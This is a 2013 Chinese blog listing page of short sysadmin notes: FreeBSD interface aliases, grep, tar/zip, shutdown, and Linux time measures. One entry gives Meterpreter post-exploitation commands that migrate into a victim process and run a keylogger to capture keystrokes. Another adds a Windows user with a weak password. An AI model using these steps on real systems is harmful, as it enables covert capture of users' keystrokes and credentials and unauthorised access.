会员
周边
众包
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
简洁模式
...
退出登录
注册
登录
漂泊客
博客园
首页
新随笔
订阅
管理
上一页
1
2
3
4
5
6
7
8
9
10
···
38
下一页
2013年12月5日
freebsd为网卡设置别名
摘要: ifconfig em0 172.16.21.5 netmask 255.255.255.0 alias
阅读全文
posted @ 2013-12-05 15:12 语辰
阅读(236)
评论(0)
推荐(0)
编辑
2013年12月3日
网址
摘要: mysql:http://www.mysqlops.com/2011/10/26/mysql-variable-third.htmlhttp://linuxguest.blog.51cto.com/195664/718576c:http://www.baike.com/wiki/%E8%BE%97%E8%BD%AC%E7%9B%B8%E9%99%A4%E6%B3%95
阅读全文
posted @ 2013-12-03 16:10 语辰
阅读(94)
评论(0)
推荐(0)
编辑
2013年11月28日
1)实际时间(real time): 从command命令行开始执行到运行终止的消逝时间; 2)用户CPU时间(user CPU time): 命令执行完成花费的用户CPU时间,即命令在用户态中执行时间总和; 3)系统CPU时间(system CPU time): 命令执行完成花费的系统CPU时
摘要: 1)实际时间(real time): 从command命令行开始执行到运行终止的消逝时间;2)用户CPU时间(user CPU time): 命令执行完成花费的用户CPU时间,即命令在用户态中执行时间总和;3)系统CPU时间(system CPU time): 命令执行完成花费的系统CPU时间,即命令在核心态中执行时间总和。
阅读全文
posted @ 2013-11-28 14:51 语辰
阅读(348)
评论(0)
推荐(0)
编辑
grep -R "关键字" 目录
摘要: grep -R "关键字" 目录
阅读全文
posted @ 2013-11-28 11:46 语辰
阅读(333)
评论(0)
推荐(0)
编辑
2013年11月26日
zip man man.config
摘要: zip man man.configzip -rzip1man.config man.zipgzipatar -cvf test.tar /home/*tar -tf test.tartar -rvf file.txt test.tarps -Atop -d 30at 5pm +3 daysat -d 1mkdir -m 777B
阅读全文
posted @ 2013-11-26 15:41 语辰
阅读(185)
评论(0)
推荐(0)
编辑
logname,who -m,who -q,id,su,su -l 用户名,su -,date,cal,cal 12 2009,cal -y 2008,du -s 目录,
摘要: logname,who -m,who -q,id,su,su -l 用户名,su -,date,cal,cal 12 2009,cal -y 2008,du -s 目录,
阅读全文
posted @ 2013-11-26 11:12 语辰
阅读(251)
评论(0)
推荐(0)
编辑
sync;sync;sync;shutdown -h now
摘要: sync;sync;sync;shutdown -h now
阅读全文
posted @ 2013-11-26 11:01 语辰
阅读(165)
评论(0)
推荐(0)
编辑
shutdown -r +1 minutes
摘要: shutdown -r +1 minutes
阅读全文
posted @ 2013-11-26 10:58 语辰
阅读(368)
评论(0)
推荐(0)
编辑
2013年11月20日
net user test 123456 /add
摘要: net user test 123456 /add
阅读全文
posted @ 2013-11-20 10:23 语辰
阅读(490)
评论(0)
推荐(0)
编辑
meterpreter > run post/windows/capture/keylog_recorder
摘要: meterpreter > migrate 1548[*] Migrating to 1548...[*] Migration completed successfully.meterpreter > run post/windows/capture/keylog_recorder在被攻击者主机上进行操作在攻击机上ctrl+c中止,然后cat 文件,看捕获到的内容
阅读全文
posted @ 2013-11-20 10:21 语辰
阅读(554)
评论(0)
推荐(0)
编辑
上一页
1
2
3
4
5
6
7
8
9
10
···
38
下一页